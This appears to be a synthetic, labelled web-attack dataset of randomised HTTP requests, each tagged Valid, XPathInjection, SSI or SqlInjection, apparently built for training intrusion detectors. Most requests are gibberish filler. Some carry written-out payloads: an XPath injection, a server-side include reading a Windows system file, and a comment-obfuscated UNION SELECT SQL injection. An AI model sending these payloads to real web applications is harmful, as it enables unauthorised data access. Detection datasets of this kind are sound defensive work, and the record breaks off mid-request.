Cookie: olq0t=\tcg@senmn;jno4jP=e$;eto8=m|e;cest=267069;ssiqt=6sscm|d<sYni;cEsO=stylelite
Cookie2: $Version="718"
Date: Mon, 10 May 04 08:04:36 UTC
ETag: "G.2NOI9hhXcPwm7wQe"
Expect: 100-continue
From: tpzRon@ec4slh.de
If-Modified-Since: Thu, 22 Jan 09 19:29:31 GMT
If-Unmodified-Since: Fri, 23 Oct 09 15:21:40 CET
If-Match: "7YaAUBrgvclFlU8o"
If-None-Match: *
If-Range: Wed, 30 Nov 05 08:04:28 UTC
Max-Forwards: 0494
MIME-Version: 5.2
Pragma: atl=Wl
Proxy-Authorization: NTLM dGN1YXVmdXRpRWljaG5ydDNvdHZpZThzdGFCdGhuZXU=
Authorization: Digest nc=8Cd6fc9b
Range: -809077,653-170430,-158191
Referer: http://baaE.uk/c2sNs4oT.wmn
TE: trailers,deflate,gzip;q=0.3
Trailer: Date
User-Agent: vsv3afnaddea
UA-CPU: MIPS
UA-Disp: 522,847,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 7112x1130
Via: FTP/7.6 www.kIluD.css, 9.6 www.iapashom.htm
Transfer-Encoding: deflate
Upgrade: 9Ehwn/4.8, rwi0/3.3, UStake/0.9, reEr0s/4.3
Warning: 770 107.102.226.41 "iZH9taPnr8p" 
X-Forwarded-For: 90.219.143.51
X-Serial-Number: 2507620494378357
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

Ieprd=sthcox)>s&te=Wtibos/a&rsaenr=tlogG:&Eeu9e9oMrsc=q'sehceaul r&oawsaoosOIulsti=iXwn2FClfgqx&p6tse0osTjl=r7snrtIosuutnntEie&3c9batsYN=stitgb&mahwvhscdphioeT=666&rtt=nAkBMgg&deze7d=30288

End - Id: 5054
Start - Id: 49886
class: XPathInjection
GET /fSXo97DxuYoqKAVB31wg/4iW852LA@Wa5VBj/etiuir/hu/rinEs/su1xo/srqn8cetetnkGbTraitt/2lfnbsrbneo2mas4s/gnhc4kHq/igvioa/e5ypdhvmrN3SxsMeh.dll?ipltbsi=brn%27+++or+++++count%28++path%2Fchild%3A%3Anode%28%29%5Bposition%28++++%29%3D%28%28+i+%2Bj%2Bk%2B+l+%2B++++1%29%5D+++++%7C++++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1+++++or+++++%27hrt%27%3D+++%27++++roSihe%27+++++or HTTP/1.0
Host: www.ecR9ml.net
Connection: n6etne8
Accept: */*
Accept-Charset: euc-jp, iso-8859-8;q=0.1, iso-2022-jp, x-mac-arabic
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-cache
Client-ip: 192.165.249.59
Cookie: ngRsyH0copyhfL=78631;rpYATh5e=5173524
Cookie2: $Version="80"
Date: Thu, 17 Feb 05 22:27:02 GMT
ETag: W/"79-wqobJXvLTgCDO1"
Expect: eIGeTy=oploiae;cire=cRuvr
From: s8can@mqtlr.fr
If-Modified-Since: Sun, 27 May 07 24:30:31 GMT
If-Unmodified-Since: Sun, 08 Mar 09 04:38:33 CET
If-Match: *
If-None-Match: "HImC579EhDlvpdI"
If-Range: Mon, 05 Apr 10 20:59:46 GMT
Max-Forwards: 5727
MIME-Version: 6.4
Pragma: iiwtSd='a7cbuQrj'
Proxy-Authorization: oAo4 hnaarqm=nniOb
Authorization: Digest realm
Range: -997,889715-,62803-
Referer: /geEie8.exe
TE: trailers
Trailer: Connection
User-Agent: Mozilla/2.7 (Machintosh; U; PPC 6.6; Fo-tE; rv:7.9.7) Gecko/54041308
UA-CPU: StrongARM
UA-Disp: 2831,824,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 5492x304
Via: HTTP/1.6 137.106.141.159:699
Transfer-Encoding: identity
Upgrade: Ez33h8/8.9, Odopt/6.7, aym/2.3, ttuho/1.9
Warning: 795 www.cmshn.tiff:1 "yslieeph7eoEbmyPt" "Wed, 09 Mar 05 02:21:36 GMT"
X-Forwarded-For: 88.207.99.219
X-Serial-Number: 87544886060
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49886
Start - Id: 4871
class: Valid
POST /wNyn_pgLstf6biaW/oWxhe5XS/uPjUL/mGw/ob9processing-instructionYH-/nHk9mZ/dsAZkzBWlgIP6Y._7P/EbinOHacmdLNb.cgi? HTTP/1.0
Content-Length: 91
Content-Language: rcUs,San9d
Content-Encoding: identity
Content-Location: http://hsobdb.org/yeect/6nry/etleo/eoaan/pji9o.wmn
Content-MD5: YTIzRXJvb3NOOWFzU3F0ag==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Oct 09 09:57:17 CET
Last-Modified: Fri, 24 Sep 04 16:41:33 GMT
Host: www.dcwn.be:83219
Connection: qz6aaa
Accept: audio/basic
Accept-Charset: x-mac-japanese;q=0.3, x-mac-arabic, utf-8
Accept-Encoding: identity;q=0.7, identity, identity;q=0.2
Accept-Language: ere2y6f-suo;q=0.2, arr-mrgye;q=0.8, gpa5e-eaan;q=0.1
Cache-Control: no-transform
Client-ip: 184.17.21.85
Cookie: eieo8Sibmsnotae=51200;pzY4@ho=4ut;64b=eEaeutspezSpd1lo;eoe1ae3teezrer=;dSiaiwl0IevalRYmv'idap
Cookie2: $Version="272"
Date: Thu, 04 Mar 04 15:49:24 UTC
ETag: "dcMVOniXcAScfLf"
Expect: Fsehcm
From: iwez885u@t0xh0Td.fr
If-Modified-Since: Fri, 28 Jan 05 14:21:46 GMT
If-Unmodified-Since: Mon, 17 Jan 05 17:29:41 GMT
If-Match: *
If-None-Match: "f_cjXDlLitL8gyT8oj3"
If-Range: *
Max-Forwards: 8
MIME-Version: 7.7
Pragma: 7hsacaU=g
Proxy-Authorization: naIcSN re1rfCoS=bpehrr
Authorization: Basic VG9lWjppSWFi
Range: 037-,-640695
Referer: http://www.lfc1.de/zRgemLat/ehnt5p/Gag3ed/adshlan.php
TE: deflate,trailers,chunked;q=0.8
Trailer: Range
User-Agent: Mozilla/1.6 (Windows; U; Windows NT 1.6; r7-ar; rv:5.2.4) Gecko/59186389
UA-CPU: Sparc
UA-Disp: 085,1074,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 931x5037
Via: HTTP/8.5 www.drsPelsr.html, aenl/9.0 www.ejreutnm.html, HTTP/2.2 218.42.44.3
Transfer-Encoding: gzip
Upgrade: rt3e/2.9, rga/0.4, wbbt/8.3
Warning: 052 www.jmtpve.html "ytaeSdIznyE" "Sat, 21 Oct 06 11:21:32 CET"
X-Forwarded-For: 166.37.58.71
X-Serial-Number: 8226641933053
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

edr1nd7a=08&ruwoe1OdmHhceo=heiye&mtsB=ootuT esapusnwinnt&r8HHqFKcyw=esfOCTg&bneassttd=97309

End - Id: 4871
Start - Id: 40362
class: SSI
GET /TtUlS/K@passwd/Rliets8ud/aviSf6J2UNZ/uRyq75x5/oBki44P4.html? HTTP/1.1
Host: www.inUssse.be
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: <!--  #include    virtual="c:\winnt\system.ini"  -->
Cache-Control: max-age=15
Client-ip: 245.2.64.69
Cookie: mzhvydi2ebc=<=2/sock_streame/eoc'B4rh;tcblrttuii=bj9yS9r2;nslewcfhshvmz=rora treyioo
Cookie2: $Version="4"
Date: Fri, 27 Jul 07 15:29:24 UTC
ETag: W/"qy6p@KNY937TrpTFqp_r"
Expect: 100-continue
From: ouihnh@oa6f8eoet.gov
If-Modified-Since: Tue, 27 Jul 04 06:22:14 UTC
If-Unmodified-Since: Sat, 02 Feb 08 23:12:31 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 15 Apr 09 15:47:08 UTC
Max-Forwards: 23
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic RHJkOTp5dGFyNG8=
Range: -62942,193769-
Referer: /wi4ant/daes8/8Rtw/cXzdd/xdre0m.wmn
TE: chunked
Trailer: TE
User-Agent: Mozilla/6.0 (X11; U; Open BSD i386 5.9; e8-La; rv:7.1.3) Gecko/69997612
UA-CPU: StrongARM
UA-OS: Windows 98
UA-Pixels: 7186x8117
Via: bedi/7.9 75.230.119.187
Transfer-Encoding: gzip
Upgrade: fwr/8.8, o6abt/9.6
Warning: 214 www.ioarta.gif "t2kbllTyjTr61loIramt" "Sun, 01 Jul 07 21:32:40 UTC"
X-Forwarded-For: 76.58.9.70
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40362
Start - Id: 664
class: Valid
GET /rkxLgd/en/deleteP.@J/cvgKQ2@ydE30KlHMD-m./7eval0N/Oisbi0ueNahTafius/divFEc3libma.q.Om/n2/teool8dwdh/m43Jdp915auVGilc05i/UhbodynetcatMzATsock_streamY/JI7g7XZS.bin? HTTP/1.1
Host: www.es5H.fr
Connection: okze
Accept: audio/basic;q=0.0, text/xml, image/gif;q=0.7
Accept-Charset: windows-1250;q=0.6
Accept-Encoding: identity, identity, deflate
Accept-Language: *;q=0.8
Cache-Control: no-transform
Client-ip: 149.220.234.93
Cookie: eUkotp0@-5=eaaeutj br;eei=i ezaautoexecrpoElrusrj<~tw;ihl6y8s=Efc7h;aeooonarr=u3eT3liblsuensJRU@;noo7ehrhFaureie=3280826
Cookie2: $Version="55"
Date: Thu, 21 Apr 05 18:44:42 GMT
ETag: W/"-mI3.VO@0Cy10pA8_D8R"
Expect: 100-continue
From: i4suSHw@tttnzs.org
If-Modified-Since: Tue, 11 Jan 05 23:23:57 UTC
If-Unmodified-Since: Mon, 05 Jun 06 23:12:39 GMT
If-Match: "LDEcsAwKT5TN6Ol6HYB"
If-None-Match: "4cs16MsCOVrRK.hs"
If-Range: Wed, 04 Oct 06 14:54:41 UTC
Max-Forwards: 5
MIME-Version: 3.8
Pragma: no-cache
Proxy-Authorization: Digest cnonce="0eSci"
Authorization: t3n7s 4wR8t=l1Is
Range: -7,9185-99305,64-211014
Referer: /eEbemz/eoan/tKbnnko/Tsat.jpg
TE: deflate;q=0.5,gzip;q=0.1,deflate
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.0 (Windows; U; Windows NT 3.4; RL-O5; rv:7.6.4) Gecko/48628063
UA-CPU: 68000
UA-Disp: 7551,458,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 947x181
Via: 9.2 www.rNn2nhfs.gif, FTP/1.8 100.54.15.173
Transfer-Encoding: Inedt1; hare=attgeht
Upgrade: servnt/2.1, oxLrlm/3.0, hnae/0.5, aicd/0.5, uhtthe/3.4
Warning: 822 www.doik.shtml:3 "omlq" "Sat, 28 Aug 04 02:17:50 UTC"
X-Forwarded-For: 165.15.81.251
X-Serial-Number: 541499677250739
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 664
Start - Id: 27437
class: Valid
GET /omegiarndnn/etkG5WXx/qxm09.jpg?uyitiuw1seyasdl=sk8DtW5fO&eaIr2ceorp7=imgt%2B&ybheIe6rnnsee=ac7w HTTP/1.0
Host: 37.210.133.184:38
Connection: close
Accept: */*;q=0.4
Accept-Charset: gb2312;q=0.0, utf-7, iso-8859-15, iso-2022-jp, x-mac-korean
Accept-Encoding: 
Accept-Language: eeeak-0e;q=0.4, do9-cwnTidn;q=0.7, ehd-eearc, Szi-rpeudig;q=0.1
Cache-Control: cft7=6gc
Client-ip: 78.137.61.177
Cookie: rtdgssgso=lHM;tiuu=hth;0.ls3winntgTstdinYlink@=083;xnSqiaerh7=26-bkH.fL6cA;Eo5oscxh2=na2pYhth
Cookie2: $Version="3"
Date: Tue, 25 Jul 06 09:59:38 CET
ETag: "TxkeDqa15iDuNrb0yk"
Expect: 7rml
From: mkpuh@Norr.org
If-Modified-Since: Thu, 13 Dec 07 20:24:47 UTC
If-Unmodified-Since: Mon, 21 Feb 05 08:32:29 GMT
If-Match: "-TRadkaDyNQibc-"
If-None-Match: "gmXzsV7feEKbufNeY"
If-Range: "sedKnLxMO4KiBtZNLMi"
Max-Forwards: 890
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: Basic ZXJmbW9zOjdyeWg=
Authorization: NTLM MWJkZHRxbHN4bmVlZW5lb2VoZG5ocnB5dW5wanphb2R0ckVveWN0c3Q=
Range: 72-
Referer: http://Tqhtao.uk/asIilm/whcsAf/mtLonIme/teEr2Odl/7a1lc.dll
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/4.2 (Windows; U; Win 9x 5.5; wo-ah; rv:2.3.8) Gecko/70687150
UA-CPU: MIPS
UA-Disp: 2797,148,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 759x1141
Via: 5.6 www.hnn7r.jpeg, neds/1.9 119.83.65.42:5721, 1.3 www.elLha.css
Transfer-Encoding: wh6TgB; ru6hlnc=lvnt
Upgrade: aof/7.7, e9Azie/5.3, isosn/8.8
Warning: 822 www.aJHeb.gif "Ee3Jmyqt1htasneg" 
X-Forwarded-For: 109.233.98.137
X-Serial-Number: 29844122
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27437
Start - Id: 29671
class: Valid
GET /agfGD1hj5.QiQq/tTYUBkBvw57G2E/3so3Nso3e6tcte/dRtribofen3v/oeGedoehz/aodnfdhoeHg3amt/utNrtatia/vY1sigK@/yosoaf8it/si7nsc43npizc9c.php?t2mtb=httprrwherepae2&4MHE8Q0uR=lvlqYeVGWd&Lnilh=%2Bee&Yy3ooqbg=tTfeZ&slbhceaaia=toptvz&rsa0he4sso=8&heodrrd=%28access_logeaE%3Dtmptestemetaa&hekalC=980 HTTP/1.0
Host: 43.235.164.210:80
Connection: close
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 61.212.179.9
Cookie: 3cafensseloiinl=ene;ATH7@nUgSgw5=xi=pbghdj5wga;ydrje8i=o
Cookie2: $Version="79"
Date: Fri, 26 Oct 07 03:52:13 GMT
ETag: "mHQJRk23s-H9cHk"
Expect: esiee
From: eIlshEtf@Tacrr5ule6.org
If-Modified-Since: Mon, 11 Jul 05 09:40:26 CET
If-Unmodified-Since: Thu, 20 Jul 06 19:30:45 CET
If-Match: *
If-None-Match: *
If-Range: "QjKzP7Ps8UB5vpersxFY"
Max-Forwards: 7
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: NTLM N2kzZG9obnRhY2llZWRDemRhYmhueGVlcmFsbnJjb2NjZW9ybW9uWXM=
Authorization: Basic b2Fsbm5yOml6dHQ2d3Rl
Range: 0-345
Referer: /St3O/neeh1.tiff
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: Mozilla/0.0 (Machintosh; U; PPC 5.6; es-to; rv:4.6.3) Gecko/10181805
UA-CPU: x86
UA-Disp: 844,9536,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 8055x615
Via: 3.1 166.37.38.51, HTTP/5.2 204.37.221.139, sHOto/3.0 35.55.252.166
Transfer-Encoding: deflate
Upgrade: hAxb/7.4, nn6e/8.2, darha/5.2, 7oa/5.8
Warning: 322 9.218.91.57 "Efrfs" "Mon, 12 May 08 03:38:33 UTC"
X-Forwarded-For: 207.227.126.195
X-Serial-Number: 149051815209
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 29671
Start - Id: 345
class: Valid
GET /sUXVsjlt8fETR/dK-7r/o1.fMl1.wFLU6n5/ZY_uS58sX_/KB5MF/ethhr/c0GaxUQKpPcoOUcdnbu/TsbensR3Nalraiilasr/efrarjkph468lBit/pA.Hnz1cDR10Z33XMDYV.nsf?aye=o%7Cme4oicd%7Eeo%24rmtl&nT5s=t+59t5b1&tsdcitdba=a%40TVmj858PY&6P-xp_9A877A-7=lmJ2kY HTTP/1.0
Host: www.ebMtwhhen.de
Connection: 7h39y
Accept: text/html;q=0.1, application/*, audio/x-wav
Accept-Charset: x-mac-arabic, gb2312;q=0.8, shift_jis;q=0.8, hz-gb-2312
Accept-Encoding: deflate;q=0.3
Accept-Language: aslqnfhO-hthnr;q=0.5, te5cKf-kvqhseaw;q=0.9, roNg4n-91yem
Cache-Control: max-stale=3
Client-ip: 192.168.223.13
Cookie: aueluIrssi51d=zr1q;oenh2aiI=argCnztreplacei lwiobit;sGi6nbocfneua0n=rDR3X9GX
Cookie2: $Version="08"
Date: Thu, 03 Nov 05 06:34:09 CET
ETag: "LPZN0wX54lCt.v_"
Expect: 100-continue
From: yifn@s7icOeis.org
If-Modified-Since: Sun, 24 Dec 06 21:12:45 CET
If-Unmodified-Since: Tue, 11 Mar 08 22:44:54 UTC
If-Match: *
If-None-Match: *
If-Range: Tue, 02 Sep 08 12:01:37 UTC
Max-Forwards: 4
MIME-Version: 1.9
Pragma: r0en0dr='28Rri1qt'
Proxy-Authorization: Basic aDJ5bGE6Y2Rzb2M1emM=
Authorization: xsot iatohf=eib9Exro
Range: -174,-56
Referer: /ueoila/5dFrornT/weRelbn/hsryb/1sogu.conf
TE: chunked;q=0.7
Trailer: Upgrade
User-Agent: tmxesprseof7Rsisez
UA-CPU: Sparc
UA-Disp: 6838,2277,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 170x4525
Via: gnor7/8.3 119.163.159.16
Transfer-Encoding: gzip
Upgrade: nbdb/2.5, ows/3.4, aiNTa/6.6
Warning: 856 133.9.23.161 "adbfddinDnmgns" "Wed, 17 Feb 10 19:40:50 GMT"
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 2216380561950619678
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 345
Start - Id: 11498
class: Valid
GET /ea.nsf?slo=539062&anialbea0t=q8hp&Tdea=oNeEeoozlameeusr&ey=60&rrOySrb=4895&3mZwCWMCQ=pkE&asLcatseaoh=l9dvarr&omEee7=794542&QqRfJiRRlqT=uOqe6oaaeuys&lto2nytia=2do6tmt03+dltOie3&naiatNikontoe=idDmJi-t3P HTTP/1.1
Host: 205.140.129.201
Connection: keep-alive
Accept: video/quicktime, text/*
Accept-Charset: *;q=0.2
Accept-Encoding: deflate;q=0.6, gzip, deflate;q=0.7, gzip
Accept-Language: arwucea-itS;q=0.1, ESet-r;q=0.1, loitomh-hviNxw4g;q=0.0, ax-ne, 4iedwj-oiDyO;q=0.0
Cache-Control: no-transform
Client-ip: 202.164.225.150
Cookie: QdeleteZjVorcpvDpr=z a
Cookie2: $Version="655"
Date: Wed, 08 Aug 07 24:44:15 UTC
ETag: W/".pewZE4RLyHSexutlCIk"
Expect: Yes1d
From: enye@7Awe.com
If-Modified-Since: Wed, 07 Apr 10 04:34:08 UTC
If-Unmodified-Since: Fri, 31 Aug 07 18:06:09 UTC
If-Match: *
If-None-Match: "ZbGR7NJSzzn-rn.z"
If-Range: *
Max-Forwards: 45
MIME-Version: 7.5
Pragma: qm=Ekfrm
Proxy-Authorization: Basic c0V0NDpzb2Zy
Authorization: Basic cndoZWdzcnE6eHRuc3U=
Range: -36
Referer: /eyemtepm/ucws/2voe.css
TE: trailers,trailers
Trailer: If-Match
User-Agent: reeTlp/1.7.0
UA-CPU: 68000
UA-Disp: 9055,045,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 9366x217
Via: 7.7 71.191.4.225, FTP/4.0 106.249.100.80
Transfer-Encoding: gzip
Upgrade: whd/4.3, coe4aa/8.8, p7uf/2.5
Warning: 090 68.2.195.170:1 "ene5ebeNyr34uhehmh" "Sun, 10 Jun 07 01:27:55 CET"
X-Forwarded-For: 0.47.132.31
X-Serial-Number: 606663375
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11498
Start - Id: 31239
class: Valid
GET /anjIAhnyJdiv21us/JZW7insert-K2/freldeic/X_7bAf6U5_mM/eltqpR6Peebsst1x6tes/3kOAIoYdEuL1k/agNyletdiRoue/X3V/etOnulll0jhkgOcH/49JL/vdFMAsJHP@3K/OSaYce.jpeg? HTTP/1.0
Host: www.oyhxu.biz
Connection: aarlo
Accept: image/*;q=0.7, video/quicktime;q=0.1
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: lnqSe0-rt;q=0.1, T7eoce-of, A6fr-lea;q=0.9, 3gndieol-npsibg, nps7-qpnItTic
Cache-Control: no-cache
Client-ip: 33.6.190.250
Cookie: ego2na1a=66
Cookie2: $Version="28"
Date: Mon, 11 Apr 05 21:17:36 CET
ETag: "w4@_N5dVXXe1hu@7"
Expect: o9osaiuc=ihTezl3i;nc8uNt=wibzeoa
From: DsosoD@ehto0.fr
If-Modified-Since: Fri, 26 Jun 09 04:14:48 CET
If-Unmodified-Since: Fri, 20 Nov 09 12:29:17 CET
If-Match: "XuDk9o7nUwreGweZ"
If-None-Match: "ERYJDMSXZR-DG-Wph"
If-Range: Mon, 19 Dec 05 19:05:31 GMT
Max-Forwards: 82
MIME-Version: 1.4
Pragma: Ir5='f'
Proxy-Authorization: wgwdn huead9ea=bent
Authorization: eD865w hoboicsa=leona
Range: 835058-581
Referer: http://nIkeser.org/norunenm/hrxyNn5n/aB30rrt/eaLxtus.bin
TE: deflate,trailers,gzip;q=0.8
Trailer: Proxy-Authorization
User-Agent: Mozilla/2.1 (Windows; U; WinNT 1.0; lm-ml; rv:1.4.1) Gecko/13254096
UA-CPU: 68000
UA-Disp: 097,2984,16
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 139x604
Via: FTP/2.3 www.vb5tq.gif
Transfer-Encoding: nde21z
Upgrade: piehe4/0.3, m8iGh/2.0, StGe/0.2, gsthsc/6.7, ach/6.4
Warning: 111 67.6.58.89 "t1sRspd" "Sat, 15 Jul 06 23:04:49 GMT"
X-Forwarded-For: 94.143.84.255
X-Serial-Number: 65900782326
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31239
Start - Id: 35187
class: SqlInjection
GET /De5liarE0bvs/eb8e/iHlP1..L.Vc@9q/nQFFyXjyex.lxS-M/leslmIhcndac1ehrehAM/etbQ1nm/Vyoeptr1ff.jpeg?oaecqoc=reeo0s3naeo&glcRoCnaSosnz=nnR&ds=%27+++%29+++++UN%2F**%2FION++ALL+SEL%2F**%2FECT+++++%27Rsn%27%2C5372%2C34845%2C%27csntNal%27%2C9++FROM+++qa+++++WHERE++%28+%27%27++%3D+%27&ei=rNddirda&udi8rNl9j=419 HTTP/1.0
Host: 87.0.89.169
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 116.56.251.175
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="711"
Date: Thu, 28 Feb 08 02:20:02 UTC
ETag: W/"MmDAZwouxSzTM9a"
Expect: twhn
From: sktrhbow@Tasrdtm7.st
If-Modified-Since: Fri, 03 Aug 07 15:25:10 UTC
If-Unmodified-Since: Fri, 21 May 04 18:51:43 GMT
If-Match: *
If-None-Match: "UkwHvXsSWbTZVHc834"
If-Range: *
Max-Forwards: 749
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: ortr bdoanD=ot23oe
Authorization: Et9m nEu55lo=aeeeo
Range: -76801,392-,94069-
Referer: http://www.ajeA.ch/atuaes/tasehp/mxsa/snryE.php3
TE: deflate
Trailer: Referer
User-Agent: ooaeoth (ab@Z17)
UA-CPU: StrongARM
UA-Disp: 1981,291,8
UA-Color: color32
UA-Pixels: 0990x1742
Via: FTP/3.0 www.idnZ5dhb.shtml:8947, 0.8 www.eosg.tiff, 8.2 226.51.246.82
Transfer-Encoding: ewyn
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35187
Start - Id: 14648
class: Valid
GET /RpAd-G2Lposition-vall1QF/@HCEt/oBlr/ew3llKeblsa/yh5ltgoi/0Mgkfrn/hAKinpqUX4sGX3g/eaR0LXPPOyz2Lb.qJU/8usIp8wthHJoee5n.jsp?niB3tt=97112742&piiSnsf=2&naoadyi=397 HTTP/1.0
Host: 162.102.8.153
Connection: keep-alive
Accept: text/html, application/rtf;q=0.9
Accept-Charset: iso-10646-ucs-2;q=0.6, iso-8859-7, windows-1254, hz-gb-2312, x-mac-chinesetrad
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-cache
Client-ip: 171.86.147.152
Cookie: VzTmailRPQhl18=tZm5lNOH;nntp3v=c0oi;iaosKm18nyler4=28217166
Cookie2: $Version="4"
Date: Fri, 23 Dec 05 11:51:05 UTC
ETag: "6mSMty0yBLjXo7I_3cJ"
Expect: dejnL
From: uneUynt@llT9mrd0ie.uk
If-Modified-Since: Thu, 20 Jan 05 19:31:01 UTC
If-Unmodified-Since: Thu, 06 May 04 13:23:12 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 28 Aug 07 16:44:21 UTC
Max-Forwards: 42
MIME-Version: 1.8
Pragma: su8eo='didotMd'
Proxy-Authorization: sCpta iMitRl=ojmbz
Authorization: NTLM Y0FsZWlzdWR4ZXRyZW5Xbm9pV25kcjZuZWNPdGhtZW5pbA==
Range: 065-,368-,-063233
Referer: /zmme/elwlvw/0dalv.pdf
TE: gzip;q=0.6
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.1 (compatible; MSIE 5.9; Solaris; tlpEiA; jctran)
UA-CPU: StrongARM
UA-Disp: 1652,237,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 557x7129
Via: 2.0 107.68.238.205
Transfer-Encoding: identity
Upgrade: sep9n/1.9, toxe/6.1, lpmu/3.8, a8iA/5.8, gtttil/4.9
Warning: 093 www.ed1gi3a.shtml:52 "snve" 
X-Forwarded-For: 243.163.162.130
X-Serial-Number: 29846910
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14648
Start - Id: 32762
class: Valid
PUT /i@Ppl2SREU5AKXHDG/RZ/eeeepcle.jpg? HTTP/1.0
Content-Length: 150
Content-Language: tro8rOim,3usetm2
Content-Encoding: deflate
Content-Location: /iet9lnst/r45sAszn/nxhacaya.wmn
Content-MD5: aVFmU3JvamNkc3p0QXljbQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 19 Apr 09 16:48:29 CET
Last-Modified: Wed, 17 Jun 09 14:10:49 CET
Host: 173.230.161.122
Connection: close
Accept: */*
Accept-Charset: iso-10646-ucs-2, windows-1258, cp-950;q=0.9, hz-gb-2312
Accept-Encoding: gzip;q=0.2, deflate;q=0.3
Accept-Language: 6fiskrTc-nr;q=0.4, eoIng-Ihta
Cache-Control: min-fresh=19578
Client-ip: 192.207.1.50
Cookie: fu1a6eaeftbswj=3054;d9l2rf6uyi=detisnhd30cdpdBq;b4pds3urcp@%uS=2%29l%22bE%2Fs4o%3Asue%22f;9yeCw=stuan;imyoei=aKR4AXhJtxir
Cookie2: $Version="4"
Date: Mon, 17 May 04 19:17:03 GMT
ETag: "wWcS@SmMVyQC9ds8o"
Expect: utMmow=rlrh
From: eadg@itnjs.uk
If-Modified-Since: Thu, 14 Apr 05 07:49:07 UTC
If-Unmodified-Since: Fri, 30 May 08 08:50:55 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 19 Apr 07 11:18:37 GMT
Max-Forwards: 9
MIME-Version: 9.2
Pragma: hnpUsvR=i
Proxy-Authorization: Digest response="810252cB7DBdEdc5Ced1969c56D3733D"
Authorization: NTLM b3RyZEh1SEN0VHJpdGFiZWVyb2x0d1V5aEFlbmRjdW5zb28=
Range: 7780-1621,55-
Referer: http://www.uvsx.st/tiiOnr/jysnAn/giCoqEk/ois9sr.mp3
TE: chunked;q=0.5,chunked;q=0.9,trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/1.8 (Windows; U; Win98 2.7; se-i0; rv:5.3.0) Gecko/81322574
UA-CPU: x86
UA-Disp: 2397,8345,8
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 322x281
Via: egsea/7.2 202.84.23.234, HTTP/8.4 252.116.162.153:05451
Transfer-Encoding: compress
Upgrade: cwnm/1.8, Pcnvc/2.3, tr9/5.6, ra7/0.0, seaag/7.9
Warning: 309 2.67.53.162:35 "k3rxAc0rieoX" 
X-Forwarded-For: 233.105.54.63
X-Serial-Number: 59787959
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

lorIlanercemfE=mMhu7_m-F&eQtd0ao8hn=90464&0IHpods=iqes&gTS.iWiqGWF7=geaqL&]dbece~tar&diec1i=p&UlY9ynfd=tup8cmwousr2einOx&i0gwNrohaa=28ftn1.fVed3

End - Id: 32762
Start - Id: 25748
class: Valid
GET /fcgO.RpFj3lgs8a/rt/rEOUo4x4/0X/s5uW0NKRmOuO_K7oc/64yOiZs5UlMubPHrxv/b6Boir1pli/nfi/eK97Ejqs.html?s7=023010&ig6d3=47184919&V78vbscriptn=cf%28eb&ie1o6tEha=lesjgiglmr&aapceiopo=ngwbzeddfT&sa6ots6nz3=nw8MNX&eeuawrhemgnlce=8148576&hwcdufrsdT9=bC6yO0w&SDhinput4DRaX=deoen&ezm=08&uteh=vaee2T HTTP/1.0
Host: 128.4.173.236
Connection: keep-alive
